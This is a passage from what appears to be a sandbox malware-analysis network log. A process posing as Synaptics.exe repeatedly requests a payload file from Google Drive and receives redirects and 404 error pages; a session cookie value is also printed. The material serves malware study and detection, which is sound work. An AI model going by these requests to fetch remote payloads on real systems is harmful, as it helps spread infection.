                                                                                                                                                        2024-12-30 10:48:33 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 72 54 4c 42 53 58 76 56 44 6a 68 75 41 4c 58 39 7a 6e 74 74 55 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="rTLBSXvVDjhuALX9znttUg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                        2024-12-30 10:48:33 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        93192.168.2.750113142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:32 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:33 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC7x5jloO1fPXoo9HMImHXRcaftSeG47HoDh46372HnTzuleZrj_ele8bFIjbnWdEssNeA3jXq0
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:33 GMT
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-_fNPlzqxrP4WsNjS6AsQiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:33 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                        2024-12-30 10:48:33 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 46 7a 41 6d 53 51 74 34 6b 72 78 54 34 4d 79 44 35 41 6b 4c 51 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="FzAmSQt4krxT4MyD5AkLQA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                        2024-12-30 10:48:33 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        94192.168.2.750119142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:33 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:34 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:34 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-sQlmecGqrHDFPGxzh4XyDA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        95192.168.2.750118142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:33 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:34 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:34 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-qjKuJ4jZWG5t7TvINSGY2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        96192.168.2.750120142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:34 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:34 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC5W6YnuABOaMnzcH905lH1YuLU8TSDgxUapWGv2OEv6pcr09ijtmnsMS5Fb_0ersk9P
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:34 GMT
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-EZFpycfDYrroUTPpizE3Ng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:34 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                        2024-12-30 10:48:34 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 73 73 59 2d 32 47 6b 35 69 61 7a 4c 32 50 62 32 6e 64 4f 53 64 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="ssY-2Gk5iazL2Pb2ndOSdQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                        2024-12-30 10:48:34 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        97192.168.2.750121142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:34 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:34 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC75v8hsAMmHLV5cMDrZEPqXt3-JFWhA7z2XQXISy9Psi0regh-UrBla2ovfTX7WbA9X9etom9E
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:34 GMT
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-a2n-I9hjO6niavD8rIUFqw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:34 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                        2024-12-30 10:48:34 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 70 31 70 69 69 68 55 58 70 2d 5f 30 79 33 4e 50 31 65 41 6a 74 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="p1piihUXp-_0y3NP1eAjtg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                        2024-12-30 10:48:34 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        98192.168.2.750122142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:34 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:35 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:35 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-NpYgjHcw1F36QxbOmuz9-Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        99192.168.2.750123142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:34 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:35 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
